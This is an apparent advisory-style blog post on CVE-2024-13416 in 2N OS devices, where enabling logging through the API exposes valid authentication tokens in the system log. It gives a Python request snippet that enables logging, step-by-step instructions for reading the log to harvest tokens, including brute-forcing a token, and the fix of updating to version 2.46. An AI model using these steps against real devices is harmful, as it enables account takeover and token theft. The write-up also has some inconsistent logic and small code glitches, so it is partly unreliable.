CVE-2024-13416 - Exploiting Valid Authentication Token Disclosure in 2N OS Devices through Logging Capability

A newly discovered vulnerability, CVE-2024-13416, is affecting the 2N OS devices. By making use of the API in the 2N OS device, an authorized user can enable logging which results in disclosing valid authentication tokens in the system log. This can create significant security risks and undermines the importance of a secure authentication process. The details of the CVE-2024-13416 vulnerability, along with the potential exploit, will be discussed in this post. Additionally, the mitigation steps provided by 2N will be highlighted, which includes updating the devices to the recently released version 2.46 of 2N OS.

The exploit can be carried out using the following code snippet

import requests

url = "http://{2N_DEVICE_IP}/api/logging/start";
headers = {
    "Authorization": "Bearer {VALID_ACCESS_TOKEN}"
}
response = requests.put(url, headers=headers)

if response.status_code == 200:
    print("Logging enabled successfully")
else:
    print("Failed to enable logging")

In order to exploit the CVE-2024-13416 vulnerability, the attacker must have knowledge of a valid access token (represented by {VALID_ACCESS_TOKEN} in the snippet) and the target 2N device's IP address ({2N_DEVICE_IP} in the snippet).

Identify the target 2N device and its IP address.

2. Obtain a valid access token. This can either be found by brute-forcing or by exploiting other vulnerabilities in the system.

3. Use the obtained access token to make an API call using the provided code snippet, which would enable logging on the target device.

4. Access the system log of the 2N device. This can be done by making a GET request to the following API endpoint:

http://{2N_DEVICE_IP}/api/logging/log

5. Analyze the system log and search for the valid authentication tokens. Once obtained, the attacker can use these tokens to authenticate themselves and potentially compromise the system.

Original References

- CVE details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-13416
- 2N OS Release Notes: https://www.2n.cz/en_GB/support/documents/firmware

Mitigation

To mitigate this vulnerability, 2N has released an updated version 2.46 of 2N OS in which the vulnerability is addressed. It is strongly recommended for all customers to update their devices to the latest version of 2N OS to prevent potential security incidents.

Conclusion

The CVE-2024-13416 vulnerability discloses valid authentication tokens in the system log, which creates severe security risks for affected 2N OS devices. By following the provided steps and code snippet, an attacker can exploit this vulnerability with minimal effort. To mitigate this, 2N has released an updated version 2.46 of 2N OS, which addresses the issue, and customers are urged to update their devices immediately.

Timeline

Published on: 02/06/2025 19:15:19 UTC
Last modified on: 02/21/2025 12:15:29 UTC